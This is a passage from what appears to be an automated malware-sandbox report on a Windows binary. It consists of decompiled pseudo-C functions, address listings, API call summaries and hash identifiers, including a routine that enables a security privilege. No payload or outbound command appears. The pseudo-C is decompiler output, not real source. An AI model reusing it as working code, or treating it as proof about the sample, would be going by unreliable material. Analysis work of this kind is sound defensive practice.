							 *(_t51 - 0x18) =  *(_t51 - 0x18) & 0x00000000;
							 *( *(_t51 - 0x1c)) =  *( *(_t51 - 0x1c)) & 0x00000000;
						}
					}
					_t32 = _t32 + 1;
				} while (_t32 < _t46);
				goto L7;
			}








                                                                                                                    0x00b135ac
                                                                                                                    0x00b135b6
                                                                                                                    0x00b135bb
                                                                                                                    0x00b135be
                                                                                                                    0x00b135c3
                                                                                                                    0x00b135c6
                                                                                                                    0x00b135ca
                                                                                                                    0x00b1363f
                                                                                                                    0x00b13645
                                                                                                                    0x00b1364d
                                                                                                                    0x00b1364d
                                                                                                                    0x00b135cf
                                                                                                                    0x00b135d6
                                                                                                                    0x00b135d9
                                                                                                                    0x00b1361c
                                                                                                                    0x00b13620
                                                                                                                    0x00b13625
                                                                                                                    0x00b13630
                                                                                                                    0x00b13631
                                                                                                                    0x00b13631
                                                                                                                    0x00b13639
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b135db
                                                                                                                    0x00b135db
                                                                                                                    0x00b135dd
                                                                                                                    0x00b135e5
                                                                                                                    0x00b13612
                                                                                                                    0x00b135e7
                                                                                                                    0x00b135eb
                                                                                                                    0x00b135f0
                                                                                                                    0x00b135fb
                                                                                                                    0x00b135fc
                                                                                                                    0x00b13601
                                                                                                                    0x00b13604
                                                                                                                    0x00b13608
                                                                                                                    0x00b13608
                                                                                                                    0x00b135eb
                                                                                                                    0x00b13617
                                                                                                                    0x00b13618
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B135AC
                                                                                                                      • Part of subcall function 00B56B33: _CxxThrowException.MSVCRT(?,00B8FFC8), ref: 00B56B59
                                                                                                                      • Part of subcall function 00B11524: __EH_prolog.LIBCMT ref: 00B11529
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$ExceptionThrow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2366012087-0
                                                                                                                    • Opcode ID: 4bbcea88ebcedfb233a7af4c8f843550a6f2ca7f6c334aeafb085b3878298a50
                                                                                                                    • Instruction ID: e0b8716c41df4236eaca15a01a27966991ede80d8dd524dd75e77ea271990277
                                                                                                                    • Opcode Fuzzy Hash: 4bbcea88ebcedfb233a7af4c8f843550a6f2ca7f6c334aeafb085b3878298a50
                                                                                                                    • Instruction Fuzzy Hash: 16116076E0420ADBCF14EB98D4826FEB3F5EF84700F9044AAA512A7291EB745E85CB40
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B2EFE3 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 97%
                                                                                                                    			E00B2EFE3(intOrPtr __ecx) {
				intOrPtr* _t43;
				char _t44;
				intOrPtr _t53;
				void* _t55;

				L00B7F140(E00B84566, _t55);
				_push(__ecx);
				_t53 = __ecx;
				 *((intOrPtr*)(_t55 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((intOrPtr*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(_t55 - 4)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				 *((intOrPtr*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((intOrPtr*)(__ecx + 0x20)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				 *((char*)(__ecx + 0x30)) = 0;
				 *((char*)(__ecx + 0x31)) = 0;
				 *((char*)(__ecx + 0x32)) = 0;
				 *((char*)(__ecx + 0x33)) = 0;
				 *((char*)(__ecx + 0x34)) = 0;
				 *((intOrPtr*)(__ecx + 0x38)) = 0;
				 *((intOrPtr*)(__ecx + 0x40)) = 0;
				 *((intOrPtr*)(__ecx + 0x48)) = 0;
				 *((intOrPtr*)(__ecx + 0x50)) = 0;
				 *((intOrPtr*)(__ecx + 0x58)) = 0;
				 *((intOrPtr*)(__ecx + 0x60)) = 0;
				 *((char*)(_t55 - 4)) = 3;
				 *((intOrPtr*)(__ecx + 0x3c)) = 0;
				 *((intOrPtr*)(__ecx + 0x44)) = 0;
				 *((intOrPtr*)(__ecx + 0x4c)) = 0;
				 *((intOrPtr*)(__ecx + 0x54)) = 0;
				 *((intOrPtr*)(__ecx + 0x5c)) = 0;
				 *((intOrPtr*)(__ecx + 0x64)) = 0;
				L00B2F092(__ecx + 0x68);
				_t43 = __ecx + 0x8c;
				 *_t43 = 0;
				 *((intOrPtr*)(_t43 + 4)) = 0;
				 *((char*)(_t55 - 4)) = 5;
				 *((char*)(__ecx + 0x95)) = 0;
				 *((intOrPtr*)(__ecx + 0x98)) = 0;
				_t44 = E00B22A5F(0); // executed
				 *((char*)(_t53 + 0x94)) = _t44;
				 *[fs:0x0] =  *((intOrPtr*)(_t55 - 0xc));
				return _t53;
			}







                                                                                                                    0x00b2efe8
                                                                                                                    0x00b2efed
                                                                                                                    0x00b2eff0
                                                                                                                    0x00b2eff4
                                                                                                                    0x00b2eff7
                                                                                                                    0x00b2eff9
                                                                                                                    0x00b2effc
                                                                                                                    0x00b2efff
                                                                                                                    0x00b2f002
                                                                                                                    0x00b2f005
                                                                                                                    0x00b2f008
                                                                                                                    0x00b2f00b
                                                                                                                    0x00b2f00e
                                                                                                                    0x00b2f011
                                                                                                                    0x00b2f014
                                                                                                                    0x00b2f017
                                                                                                                    0x00b2f01a
                                                                                                                    0x00b2f01d
                                                                                                                    0x00b2f020
                                                                                                                    0x00b2f023
                                                                                                                    0x00b2f026
                                                                                                                    0x00b2f029
                                                                                                                    0x00b2f02c
                                                                                                                    0x00b2f02f
                                                                                                                    0x00b2f032
                                                                                                                    0x00b2f035
                                                                                                                    0x00b2f038
                                                                                                                    0x00b2f03b
                                                                                                                    0x00b2f041
                                                                                                                    0x00b2f045
                                                                                                                    0x00b2f048
                                                                                                                    0x00b2f04b
                                                                                                                    0x00b2f04e
                                                                                                                    0x00b2f051
                                                                                                                    0x00b2f054
                                                                                                                    0x00b2f057
                                                                                                                    0x00b2f05c
                                                                                                                    0x00b2f062
                                                                                                                    0x00b2f064
                                                                                                                    0x00b2f067
                                                                                                                    0x00b2f06b
                                                                                                                    0x00b2f071
                                                                                                                    0x00b2f077
                                                                                                                    0x00b2f07f
                                                                                                                    0x00b2f089
                                                                                                                    0x00b2f091

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B2EFE8
                                                                                                                      • Part of subcall function 00B22A5F: __EH_prolog.LIBCMT ref: 00B22A64
                                                                                                                      • Part of subcall function 00B22A5F: GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,766E89A0), ref: 00B22A76
                                                                                                                      • Part of subcall function 00B22A5F: OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,766E89A0), ref: 00B22A8D
                                                                                                                      • Part of subcall function 00B22A5F: LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00B22AAF
                                                                                                                      • Part of subcall function 00B22A5F: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,766E89A0), ref: 00B22AC4
                                                                                                                      • Part of subcall function 00B22A5F: GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,766E89A0), ref: 00B22ACE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prologProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1532160333-0
                                                                                                                    • Opcode ID: 57e2e9ce3d2fd9151db8b434c636df2ebb48b6c92312da6128cde546eadbe56d
                                                                                                                    • Instruction ID: 945fe279cc2a40258063342ea3e915437eda83c419cf5eac775ae60f4398d50d
                                                                                                                    • Opcode Fuzzy Hash: 57e2e9ce3d2fd9151db8b434c636df2ebb48b6c92312da6128cde546eadbe56d
                                                                                                                    • Instruction Fuzzy Hash: 51213AB1846B90CFC321CF6A82C0686FFF0BB19600B9499AED0DE83B12C770A508CF55
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B30A38 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00B30A38(void* __ecx, intOrPtr* __edx) {
				void* _t16;
				intOrPtr* _t41;
				void* _t43;

				_t16 = L00B7F140(E00B847F8, _t43);
				_t41 = __edx;
				if( *((intOrPtr*)(__edx + 4)) != 0) {
					_t16 = E00B14596(__edx);
					if(_t16 == 0) {
						_t16 = E00B30AD2( *_t41);
						if(_t16 == 0) {
							_t2 = _t43 - 0x50; // -80
							E00B16529(_t2);
							_t3 = _t43 - 0x28; // -40
							E00B12D90(_t3);
							 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
							_t6 = _t43 - 0x18; // -24
							E00B12D35(_t6, __ecx, _t41);
							 *(_t43 - 4) = 1;
							if(E00B18383( *((intOrPtr*)(_t43 - 0x18))) == 0) {
								_t9 = _t43 - 0x50; // -80
								_t20 = E00B169AB(_t9,  *((intOrPtr*)(_t43 - 0x18)), 0); // executed
								if(_t20 != 0) {
									_t11 = _t43 - 0x28; // -40
									_t20 = L00B12F78(_t41, _t11);
								}
							}
							_t16 = E00B11E89(E00B11E89(_t20,  *((intOrPtr*)(_t43 - 0x18))),  *((intOrPtr*)(_t43 - 0x28)));
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
				return _t16;
			}






                                                                                                                    0x00b30a3d
                                                                                                                    0x00b30a47
                                                                                                                    0x00b30a4f
                                                                                                                    0x00b30a53
                                                                                                                    0x00b30a5a
                                                                                                                    0x00b30a5e
                                                                                                                    0x00b30a65
                                                                                                                    0x00b30a67
                                                                                                                    0x00b30a6a
                                                                                                                    0x00b30a6f
                                                                                                                    0x00b30a72
                                                                                                                    0x00b30a77
                                                                                                                    0x00b30a7e
                                                                                                                    0x00b30a81
                                                                                                                    0x00b30a89
                                                                                                                    0x00b30a94
                                                                                                                    0x00b30a98
                                                                                                                    0x00b30a9e
                                                                                                                    0x00b30aa5
                                                                                                                    0x00b30aa7
                                                                                                                    0x00b30aad
                                                                                                                    0x00b30aad
                                                                                                                    0x00b30aa5
                                                                                                                    0x00b30abd
                                                                                                                    0x00b30ac3
                                                                                                                    0x00b30a65
                                                                                                                    0x00b30a5a
                                                                                                                    0x00b30ac9
                                                                                                                    0x00b30ad1

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B30A3D
                                                                                                                      • Part of subcall function 00B169AB: __EH_prolog.LIBCMT ref: 00B169B0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: dc6b4c1743545cd6f40227096d7fb528e670fef22290cf1f164ad628e6975334
                                                                                                                    • Instruction ID: 35a283eb41a268252373759b055a14b832a4701c2fa581c32158f357bfb7e010
                                                                                                                    • Opcode Fuzzy Hash: dc6b4c1743545cd6f40227096d7fb528e670fef22290cf1f164ad628e6975334
                                                                                                                    • Instruction Fuzzy Hash: 3B118E719102049ACF14FB94E4627EDBBF5AF54350F9444E8E402B31A2DF305D89C660
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B25513 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 92%
                                                                                                                    			E00B25513(void* __ecx) {
				intOrPtr _t24;
				void* _t25;
				intOrPtr* _t35;
				intOrPtr* _t36;
				void* _t46;
				intOrPtr _t48;

				L00B7F140(0xb83ca0, _t46);
				_t24 =  *((intOrPtr*)(_t46 + 8));
				_t35 =  *((intOrPtr*)(_t24 + 0x74));
				 *((intOrPtr*)(_t46 - 0x10)) = _t48;
				 *((intOrPtr*)(_t46 - 4)) = 0;
				if(_t35 == 0) {
					 *((char*)(_t24 + 0x31)) = 0;
					if( *((intOrPtr*)(_t46 + 0xc)) == 0) {
						if( *((intOrPtr*)(_t24 + 0x3f)) == 0) {
							 *((char*)(_t24 + 0x31)) = 1;
						} else {
							 *((intOrPtr*)(_t46 + 0xc)) = 1;
						}
					}
					asm("sbb ebx, ebx");
					_t36 =  *((intOrPtr*)(_t24 + 0x50));
					_t25 =  *((intOrPtr*)( *_t36 + 0x18))(_t36,  *((intOrPtr*)(_t24 + 0x80)), 0 |  *((intOrPtr*)(_t24 + 0xb2)) != 0x00000000,  *((intOrPtr*)(_t46 + 0xc)),  ~( *(_t24 + 0x30)) & _t24 + 0x000000d0);
				} else {
					_t25 =  *((intOrPtr*)( *_t35 + 0x14))(_t35,  *((intOrPtr*)(_t46 + 0xc)));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0xc));
				return _t25;
			}









                                                                                                                    0x00b25518
                                                                                                                    0x00b2551e
                                                                                                                    0x00b25525
                                                                                                                    0x00b2552b
                                                                                                                    0x00b2552e
                                                                                                                    0x00b25531
                                                                                                                    0x00b25541
                                                                                                                    0x00b25544
                                                                                                                    0x00b25549
                                                                                                                    0x00b25554
                                                                                                                    0x00b2554b
                                                                                                                    0x00b2554b
                                                                                                                    0x00b2554b
                                                                                                                    0x00b25549
                                                                                                                    0x00b25563
                                                                                                                    0x00b25565
                                                                                                                    0x00b25584
                                                                                                                    0x00b25533
                                                                                                                    0x00b25539
                                                                                                                    0x00b25539
                                                                                                                    0x00b25599
                                                                                                                    0x00b255a2

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 8197540dcdc9b06248c5473247796f8f871ada94488a825fc81c97d51a991009
                                                                                                                    • Instruction ID: eb2232ee75cd9236bc12650d5b3e92c65557abe282f4c46745666af4ac30c29d
                                                                                                                    • Opcode Fuzzy Hash: 8197540dcdc9b06248c5473247796f8f871ada94488a825fc81c97d51a991009
                                                                                                                    • Instruction Fuzzy Hash: 8B11AC71508654EFCB14CF6AD484FA97BF6FF59300F1980E9E0199F122C275D944CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B26BCC Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 93%
                                                                                                                    			E00B26BCC(void* __ecx, void* __eflags) {
				intOrPtr* _t24;
				signed char _t26;
				void* _t28;
				void* _t50;

				L00B7F140(0xb83e4c, _t50);
				E00B26EEB(__ecx + 0x98);
				E00B36CB9(__ecx + 0x1c);
				_t45 = __ecx + 0x48;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				 *((intOrPtr*)(__ecx + 0x38)) = 0;
				 *(__ecx + 0x18) =  *(__ecx + 0x18) & 0;
				 *(__ecx + 0x19) =  *(__ecx + 0x19) & 0;
				L00B12F78(__ecx + 0x48,  *((intOrPtr*)(_t50 + 8)));
				_t24 = E00B12D35(_t50 - 0x18, _t45,  *((intOrPtr*)(_t50 + 0xc)));
				 *(_t50 - 4) = 0;
				_t26 = E00B169AB(__ecx + 0x60,  *_t24, 1); // executed
				asm("sbb bl, bl");
				 *(_t50 - 4) =  *(_t50 - 4) | 0xffffffff;
				E00B11E89(_t26,  *((intOrPtr*)(_t50 - 0x18)));
				if( ~_t26 + 1 == 0) {
					_t28 = 0;
				} else {
					_t28 = L00B1729C();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t50 - 0xc));
				return _t28;
			}







                                                                                                                    0x00b26bd1
                                                                                                                    0x00b26be4
                                                                                                                    0x00b26bec
                                                                                                                    0x00b26bf6
                                                                                                                    0x00b26bf9
                                                                                                                    0x00b26bfc
                                                                                                                    0x00b26bff
                                                                                                                    0x00b26c02
                                                                                                                    0x00b26c07
                                                                                                                    0x00b26c14
                                                                                                                    0x00b26c21
                                                                                                                    0x00b26c24
                                                                                                                    0x00b26c30
                                                                                                                    0x00b26c32
                                                                                                                    0x00b26c38
                                                                                                                    0x00b26c43
                                                                                                                    0x00b26c4c
                                                                                                                    0x00b26c45
                                                                                                                    0x00b26c45
                                                                                                                    0x00b26c45
                                                                                                                    0x00b26c51
                                                                                                                    0x00b26c59

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B26BD1
                                                                                                                      • Part of subcall function 00B169AB: __EH_prolog.LIBCMT ref: 00B169B0
                                                                                                                      • Part of subcall function 00B11E89: free.MSVCRT(?,00B36CD6,00000000,00000000,00000001,?,00B110EB), ref: 00B11E8D
                                                                                                                      • Part of subcall function 00B1729C: GetLastError.KERNEL32(00B1B903), ref: 00B1729C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$ErrorLastfree
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 683690243-0
                                                                                                                    • Opcode ID: f49d3daf8c8b27109f4f548c403024231f5f488156e8ce99ec0cd27fd843f515
                                                                                                                    • Instruction ID: c6c7ed8574dcbb5f5e4debe3ae261cff97a5d169393dc702935c5e5c3a8477e2
                                                                                                                    • Opcode Fuzzy Hash: f49d3daf8c8b27109f4f548c403024231f5f488156e8ce99ec0cd27fd843f515
                                                                                                                    • Instruction Fuzzy Hash: B201D676A407009FC725FF74D8925DEBBF1EF49310F5046AEE88753691CA30A649CA50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B57EEC Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 86%
                                                                                                                    			E00B57EEC(void* __ebx, signed int __ecx) {
				void* _t24;
				intOrPtr* _t29;
				void* _t32;
				void* _t34;
				signed int _t42;
				void* _t46;

				_t34 = __ebx;
				L00B7F140(0xb875d1, _t46);
				_push(__ecx);
				_t42 = __ecx;
				 *(_t46 - 0x10) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0xb8eb78;
				 *((intOrPtr*)(__ecx + 4)) = 0xb8eb5c;
				 *((intOrPtr*)(__ecx + 8)) = 0xb8eb4c;
				 *((intOrPtr*)(__ecx + 0xc)) = 0xb8eb38;
				_push(__ecx);
				 *(_t46 - 4) = 1;
				_t24 = L00B590C6(__ecx); // executed
				E00B11E89(E00B11E89(E00B11E89(_t24,  *((intOrPtr*)(__ecx + 0x21c))),  *((intOrPtr*)(_t42 + 0x210))),  *((intOrPtr*)(_t42 + 0x204)));
				L00B57FD2(_t42 + 0xb0);
				_t29 =  *((intOrPtr*)(_t42 + 0xa8));
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				if(_t29 != 0) {
					 *((intOrPtr*)( *_t29 + 8))(_t29);
				}
				asm("sbb esi, esi");
				_t44 =  ~_t42 & _t42 + 0x00000018;
				 *(_t46 - 0x10) =  ~_t42 & _t42 + 0x00000018;
				 *(_t46 - 4) = 2;
				L00B298A8(( ~_t42 & _t42 + 0x00000018) + 0x40);
				 *(_t46 - 4) =  *(_t46 - 4) | 0xffffffff;
				_t32 = E00B361A0(_t34, _t44 + 0x34);
				 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0xc));
				return _t32;
			}









                                                                                                                    0x00b57eec
                                                                                                                    0x00b57ef1
                                                                                                                    0x00b57ef6
                                                                                                                    0x00b57ef8
                                                                                                                    0x00b57efa
                                                                                                                    0x00b57efd
                                                                                                                    0x00b57f03
                                                                                                                    0x00b57f0a
                                                                                                                    0x00b57f11
                                                                                                                    0x00b57f18
                                                                                                                    0x00b57f19
                                                                                                                    0x00b57f20
                                                                                                                    0x00b57f41
                                                                                                                    0x00b57f4f
                                                                                                                    0x00b57f54
                                                                                                                    0x00b57f5a
                                                                                                                    0x00b57f60
                                                                                                                    0x00b57f65
                                                                                                                    0x00b57f65
                                                                                                                    0x00b57f6d
                                                                                                                    0x00b57f6f
                                                                                                                    0x00b57f71
                                                                                                                    0x00b57f77
                                                                                                                    0x00b57f7e
                                                                                                                    0x00b57f83
                                                                                                                    0x00b57f8a
                                                                                                                    0x00b57f93
                                                                                                                    0x00b57f9b

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B57EF1
                                                                                                                      • Part of subcall function 00B590C6: __EH_prolog.LIBCMT ref: 00B590CB
                                                                                                                      • Part of subcall function 00B11E89: free.MSVCRT(?,00B36CD6,00000000,00000000,00000001,?,00B110EB), ref: 00B11E8D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2654054672-0
                                                                                                                    • Opcode ID: 9a781e0b0d6a5187919cd5646025b64722d15155742b5046e55f52212485f4ad
                                                                                                                    • Instruction ID: b0956cd41cfd6241e0af5d1a6908ff85d099bc842247014ed7c877f76c843e92
                                                                                                                    • Opcode Fuzzy Hash: 9a781e0b0d6a5187919cd5646025b64722d15155742b5046e55f52212485f4ad
                                                                                                                    • Instruction Fuzzy Hash: 80115271800715DBD724EF64D845BDABBF4FF00304F10899DE4ABA75A1DBB0A908CB80
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B57CDD Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 95%
                                                                                                                    			E00B57CDD(intOrPtr __ecx, void* __edx) {
				intOrPtr* _t30;
				intOrPtr* _t31;
				void* _t45;

				L00B7F140(0xb87583, _t45);
				_push(__ecx);
				 *((intOrPtr*)(_t45 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0xb8b0d8;
				 *((intOrPtr*)(__ecx + 4)) = 0xb8b0bc;
				 *((intOrPtr*)(__ecx + 8)) = 0xb8b098;
				 *((intOrPtr*)(__ecx + 0xc)) = 0xb8b0a8;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				E00B57D91(__ecx + 0x18, __edx, 0); // executed
				 *((intOrPtr*)(_t45 - 4)) = 0;
				 *((intOrPtr*)(__ecx + 0xa8)) = 0;
				 *((char*)(_t45 - 4)) = 1;
				E00B58109(__ecx + 0xb0, 0);
				 *((char*)(_t45 - 4)) = 2;
				E00B12D90(__ecx + 0x204);
				_t30 = __ecx + 0x210;
				 *_t30 = 0;
				 *((intOrPtr*)(_t30 + 4)) = 0;
				 *((intOrPtr*)(_t30 + 8)) = 0;
				_t31 = __ecx + 0x21c;
				 *_t31 = 0;
				 *((intOrPtr*)(_t31 + 4)) = 0;
				 *((intOrPtr*)(_t31 + 8)) = 0;
				 *((intOrPtr*)(__ecx)) = 0xb8eb78;
				 *((intOrPtr*)(__ecx + 4)) = 0xb8eb5c;
				 *((intOrPtr*)(__ecx + 8)) = 0xb8eb4c;
				 *((intOrPtr*)(__ecx + 0xc)) = 0xb8eb38;
				 *((char*)(__ecx + 0x200)) = 0;
				 *((char*)(__ecx + 0x201)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return __ecx;
			}






                                                                                                                    0x00b57ce2
                                                                                                                    0x00b57ce7
                                                                                                                    0x00b57cee
                                                                                                                    0x00b57cf1
                                                                                                                    0x00b57cf7
                                                                                                                    0x00b57cfe
                                                                                                                    0x00b57d05
                                                                                                                    0x00b57d0f
                                                                                                                    0x00b57d12
                                                                                                                    0x00b57d17
                                                                                                                    0x00b57d1a
                                                                                                                    0x00b57d26
                                                                                                                    0x00b57d2a
                                                                                                                    0x00b57d35
                                                                                                                    0x00b57d39
                                                                                                                    0x00b57d3e
                                                                                                                    0x00b57d47
                                                                                                                    0x00b57d49
                                                                                                                    0x00b57d4c
                                                                                                                    0x00b57d4f
                                                                                                                    0x00b57d55
                                                                                                                    0x00b57d57
                                                                                                                    0x00b57d5a
                                                                                                                    0x00b57d5d
                                                                                                                    0x00b57d63
                                                                                                                    0x00b57d6a
                                                                                                                    0x00b57d71
                                                                                                                    0x00b57d78
                                                                                                                    0x00b57d7e
                                                                                                                    0x00b57d88
                                                                                                                    0x00b57d90

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B57CE2
                                                                                                                      • Part of subcall function 00B57D91: __EH_prolog.LIBCMT ref: 00B57D96
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
